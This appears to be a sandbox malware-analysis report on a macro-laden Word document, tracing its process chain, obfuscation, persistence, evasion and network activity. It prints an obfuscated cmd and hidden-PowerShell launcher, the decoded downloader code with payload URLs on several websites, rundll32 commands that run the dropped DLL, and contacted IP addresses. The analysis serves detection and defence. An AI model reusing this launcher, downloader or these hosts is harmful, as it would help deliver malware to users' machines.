                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v............0...............X.].............T...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.................u.............}..v....x4......0...............X.].............T...............
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                      Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: ARCH_25_012021.doc Virustotal: Detection: 57%
                      Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
                      Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
                      Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: ARCH_25_012021.doc | Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
                      Source: VBA code instrumentation | OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_
                      Obfuscated command line found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACg
AJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
                      Suspicious powershell command line found
                      Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00292D98 push 00292E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A0020 push 002A0058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00294038 push 00294064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026A0B4 push 0026A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026A0B2 push 0026A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026B274 push 0026B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0027C34C push 0027C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A0498 push 002A04EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A04F4 push 002A055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A05B8 push 002A05E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0029B588 push 0029B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A0580 push 002A05ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A05F0 push 002A063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A0654 push 002A0680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A068C push 002A06B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A06C4 push 002A06F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026D6DC push 0026D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00268748 push 00268774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026D754 push 0026D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A37A8 push 002A37E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00268798 push 002687C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A07E4 push 002A0827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A0834 push 002A0860h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A086C push 002A0898h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002A3848 push 002A3874h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026C8A4 push 0026C8E6h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0026C8A2 push 0026C8E6h; ret

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
                      Source: C:\Windows\SysWOW64\rundll32.exe | PE file moved: C:\Windows\SysWOW64\Xsugi\zrfn.shd

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Xsugi\zrfn.shd:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Omuzql\aridm.cve:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00241D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_005112C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00231D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002D12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001E12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_001C12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002212C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_001812C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00711D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006A12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_00741D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_007E12C1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe | Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 217.160.169.110 144
                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 51.255.203.164 144
                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 185.183.16.47 80
                      Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 84.232.229.24 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\System32\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exe; Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
